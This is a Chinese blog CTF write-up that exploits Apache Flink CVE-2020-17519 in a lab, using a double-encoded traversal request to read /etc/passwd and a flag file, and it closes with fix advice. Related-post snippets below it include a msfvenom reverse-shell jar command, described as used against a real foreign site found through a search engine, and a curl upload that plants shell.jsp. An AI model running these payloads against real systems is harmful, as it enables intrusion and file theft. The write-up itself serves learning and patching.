CTF题目:Apache Flink目录遍历漏洞实战及CVE-2020-17519漏洞分析

原创 于 2025-06-14 12:28:47 发布 · 1.5k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #flink #大数据 #CTF

CTF题目:Apache Flink目录遍历漏洞实战及CVE-2020-17519漏洞分析

漏洞背景

CVE-2020-17519是Apache Flink 1.11.0-1.11.2版本中的高危目录遍历漏洞。攻击者可通过构造恶意路径遍历读取服务器任意文件,本文将详细演示漏洞利用过程。

环境搭建

  • 靶机环境:Apache Flink Dashboard (1.11.0)
  • 测试工具:BurpSuite Community 2023
  • 漏洞入口Job Manager功能模块(日志文件接口)

截屏2025-06-14 11.01.34

漏洞复现步骤

1. 发现漏洞入口

访问Flink Dashboard的Job Manager功能,Burp捕获请求:

GET /jobmanager/logs/ HTTP/1.1
Host: d25db443-a7db-44ea-986a-f48afb33bc23-2700.cyberstrikelab.com:83

截屏2025-06-14 11.24.57

2. 构造路径遍历Payload

尝试直接读取/etc/passwd失败:

GET /jobmanager/logs/../../../../../../etc/passwd HTTP/1.1

截屏2025-06-14 11.14.04

绕过方案
使用双重URL编码绕过路径过滤:

  • ..%252f → 第一次解码:..%2f → 第二次解码:../
  • 12级跳转回到根目录:..%252f × 12

最终Payload

GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1
3. 成功读取系统文件

响应返回/etc/passwd内容:

root:x:0:0:root:/root:/bin/bash
flink:x:1000:1000::/opt/flink:/bin/sh  # 关键信息!

发现用户flink及其主目录/opt/flink,推测flag可能位于此路径。

截屏2025-06-14 11.26.10

深度利用:定位flag文件

策略思路
  1. 优先级1:用户目录常见位置
    • /opt/flink/flag
    • /opt/flink/flag.txt
  2. 优先级2:临时目录
    • /tmp/flag
    • /tmp/flag.txt
  3. 优先级3:配置文件与日志
    • /opt/flink/conf/flink-conf.yaml(分析无敏感信息)
    • /opt/flink/log/*.log
成功获取flag

在尝试读取/tmp/flag.txt时成功:

GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fflag.txt HTTP/1.1

响应内容

截屏2025-06-13 21.53.33

备注:截图中的Host是第一次成功时候的截图,之前的截图是写博客复现重新开启的靶机。(因为靶机域名是随机生成)

漏洞原理分析

  1. 根本原因
    Flink未对jobmanager/logs接口的路径参数做规范化校验,导致..%252f被双重解码为../

  2. 绕过关键
    防御层通常过滤../但忽略双重编码场景,%252f的两次解码过程:

    服务器解码
    二次解码
    %252f
    %2f
    /

修复建议

  1. 升级到Flink ≥1.11.3 或 ≥1.12.0
  2. 在代码层添加路径规范化检查:
    Paths.get(userInput).normalize().toString()

总结

通过本次实战我们掌握:

  1. 目录遍历漏洞的双重编码绕过技巧
  2. 系统敏感文件定位思路(/etc/passwd → 用户目录 → 临时文件)
  3. CVE-2020-17519的完整利用链

漏洞修复补丁:FLINK-21436

该博客结构清晰覆盖漏洞复现全流程,既适合CTF初学者理解漏洞原理,也为安全研究人员提供深度利用思路。如需补充截图或调整技术细节,可随时告知。

[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)
qq_51577576的博客
09-26 3762
[ vulhub漏洞复现篇 ] Apache Flink目录遍历 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件读取。
Aiohttp 目录遍历漏洞CVE-2024-23334)
iSee857的博客
09-02 1131
aiohttp 是一个用于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。使用aiohttp作为Web服务器并配置静态路由时,需要指定静态文件的根路径。使用aiohttp实现的Web服务在 配置aiohttp中的静态资源解析时使用了不安全的参数follow_symlinks,代码如routes.static("/static", static_dir, follow_symlinks=True) 成功利用该漏洞可读取服务器上任意文件。官方已在3.9.2及以上版本中修复次漏洞
apache flink目录遍历漏洞CVE-2020-17518复现)
ANYOUZHEN的博客
06-04 1432
漏洞描述:apache Flink目录遍历漏洞,可通过REST API读/写远程文件影响版本:Flink 1.5.1-1.11.2接下来开始复现:我们通过vulhub进行复现打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令) 然后输入kali密码即可成功启动环境接下来我们查看当前环境:在靶场终端输入: 但是在我的kali2022上面出现了报错:8行,和上一篇文章出现了一样的问题,上网搜
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
使用方法&免责声明 该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、1.11.2 工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
Apache Flink CVE-2020-17519
weixin_45682070的博客
02-04 312
fofa搜索Apache Flink app="APACHE-Flink" &&country="IN" 未授权任意上传jar包导致远程代码执行,找一个阿三的站试试 1:上传生成好的jar包 msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4568 -f jar > main.jar 上传jar包之后监听端口 use exploit/multi/handler set payload java/shell/reve
CVE-2020-17519:CVE-2020-17519猎豹
04-17
CVE-2020-17519 CVE-2020-17519 Cheetah语言版,支持批量扫描。 将ip.txt复制到/script/漏洞探测/Apache/文件夹下,打开Wker主程序
CVE-2024-36104 Apache OFBiz路径遍历RCE漏洞复现(附POC)
mashiro_hibiki的博客
06-05 2713
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。Apache_OFBiz是一套基于通用架构的企业应用程序,使用通用数据,逻辑和流程组件。
[系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现及Windows验证机制分析
热门推荐
杨秀璋的专栏
02-17 1万+
作者前文介绍了什么是数字签名,利用Asn1View、PEVie、010Editor等工具进行数据提取和分析,这是全网非常新的一篇文章,希望对您有所帮助。这篇文章将详细介绍微软证书漏洞CVE-2020-0601,并讲解ECC算法、Windows验证机制,复现可执行文件签名证书的例子。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、文档、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参
weblogic反序列化之CVE-2020-2555漏洞分析
weixin_45682070的博客
03-18 4919
前言 CVE-2020-2555主要源于在coherence.jar存在着用于gadget构造的类(反序列化构造类),并且利用weblogic默认存在的T3协议进行传输和解析进而导致weblogic服务器反序列化恶意代码最后执行攻击语句。 Oracle Coherence组件默认集成在Weblogic12c及以上版本中。 ...
exp:CVE-2024-2961将phpfilter任意文件读取提升为远程代码执行(RCE)
10-30
在评估和利用这个漏洞的过程中,研究者们发现了一个问题,原本认为仅能造成任意文件读取的安全漏洞,经过深入分析和利用,实际上能够提升为远程代码执行(RCE)。 首先,让我们简单解释一下phpfilter是什么。...
Apache Flink任意文件读取(CVE-2020-17519)
m0_65150886的博客
01-29 343
Apache Flink 功能强大,支持开发和运行多种不同种类的应用程序。它的主要特性包括:批流一体化、精密的状态管理、事件时间支持以及精确一次的状态一致性保障等。Flink不仅可以运行在包括YARN、Mesos、Kubernetes在内的多种资源管理框架上,还支持在裸机集群上独立部署。事实证明,Flink已经可以扩展到数千核心,其状态可以达到TB级别,且仍能保持高吞吐、低延迟的特性。Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。
CVE-2020-17519/17518 Apache Flink 文件操作漏洞复现
ximo的博客
03-31 600
简介 Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。 漏洞简介 CVE-2020-17518攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。 CVE-2020-17519Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问
Flink高危漏洞 (CVE-2020-17518/17519) 修复指南
u013289115的博客
01-19 4899
一、背景二、修复方法三、详细步骤1.准备flink源码2.找到修复的commit3.编译打包4.替换jar包四、总结 一、背景 ​ 国家信息安全漏洞库(CNNVD)收到关于Apache Flink安全漏洞(CNNVD-202101-271、CVE-2020-17519)(CNNVD-202101-273、CVE-2020-17518)情况的报送。成功利用漏洞的攻击者,可在未授权的情况下,构造恶意数据执行任意文件读取或文件写入攻击,最终获取服务器敏感性信息或权限。Apache Flink 1.5.1 - .
Apache Flink jobmanager/logs 目录穿越漏洞CVE-2020-17519
weixin_53639243的博客
02-23 319
复现:访问首页exp利用。
Apache Flink目录遍历漏洞
ITgougou_的博客
01-07 389
fofa语法搜索app="Apache-Flink" poc: http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 读取成功
Apache Flink目录遍历漏洞(REST API读/写远程文件)
crowsec
02-10 1497
CVE-2020-17518复现
Apache Flink 目录遍历漏洞 CVE-2020-17519
m0_54323635的博客
08-31 654
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519漏洞等级:高危,漏洞评分:8.5。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
Apache Flink jobmanager 目录遍历漏洞
weixin_46801402的博客
11-02 636
Apache Flink jobmanager 目录遍历漏洞
flink 文件写入 (CVE-2020-17518)获取flag
最新发布
04-01
### Flink CVE-2020-17518 文件写入漏洞 Flag 获取方式 #### 背景介绍 CVE-2020-17518 是 Apache Flink 的一个高危漏洞,允许攻击者通过修改 HTTP 头部字段来实现任意文件写入。此漏洞影响版本范围为 Apache Flink 1.5.1 至 1.11.2[^3]。 当利用该漏洞时,通常目标是向服务器植入恶意脚本或配置文件以完成进一步渗透测试任务。Flag 获取通常是 CTF 或安全演练中的一个重要环节,其核心在于如何成功执行命令或将特定数据写入指定路径下的文件中。 --- #### 利用过程概述 为了获取 Flag,可以通过以下方式进行: 1. **构建恶意请求** 攻击者需要构造一个带有自定义 `Location` 参数的 POST 请求,用于覆盖默认的目标存储路径。具体来说,`Location` 字段决定了上传文件保存的位置。如果设置成 `/etc/passwd` 或其他敏感文件,则可能引发服务异常;但如果指向临时目录或者 Web 可访问区域,则可用来放置反序列化载荷或其他工具脚本。 下面是一个典型的 curl 命令示例: ```bash curl -X POST http://<target>:8081/jars/upload \ --header 'Content-Disposition: form-data; name="file"; filename="/../../../../../../tmp/shell.jsp"' \ --form file=@"/path/to/malicious_file" ``` 此处需要注意的是,`filename` 属性被篡改为包含多个 `../` 来突破正常沙盒限制,并最终定位至期望的目的地文件夹下[^5]。 2. **验证写入结果** 成功发送上述 payload 后,应立即检查对应位置是否存在预期生成的新文件。例如,在 Linux 平台上尝试读取刚才创建的内容确认是否生效: ```bash cat /tmp/shell.jsp ``` 如果一切顺利的话,应该能看到我们之前提交上去的数据片段。 3. **提取 Flag 数据** 接下来就是寻找实际比赛场景里预埋好的标记字符串了——这一步取决于主办方设计的具体规则以及隐藏形式。一般情况下会嵌套于某些特殊命名模式的日志记录、数据库表项甚至是图片元信息之中。因此建议采用正则表达式扫描整个磁盘分区查找匹配关键字的方式快速锁定答案所在之处: ```python import os def find_flag(directory, keyword): for root, dirs, files in os.walk(directory): for fname in files: fpath = os.path.join(root, fname) try: with open(fpath, errors='ignore') as fp: content = fp.read() if keyword in content: print(f"[+] Found flag at {fpath}") except Exception as e: pass # Example usage find_flag('/mnt', 'flag{') ``` 使用 Python 编写的这段简单函数可以帮助自动化这一繁琐流程,只需调整搜索起点与标志词即可适应不同题目需求[^4]。 --- ### 注意事项 尽管演示过程中展示了多种技术手段辅助解决问题,但在真实世界环境中实施此类行为均属非法入侵范畴,请务必严格遵守法律法规仅限授权范围内开展相关活动! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bruce_xiaowei

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值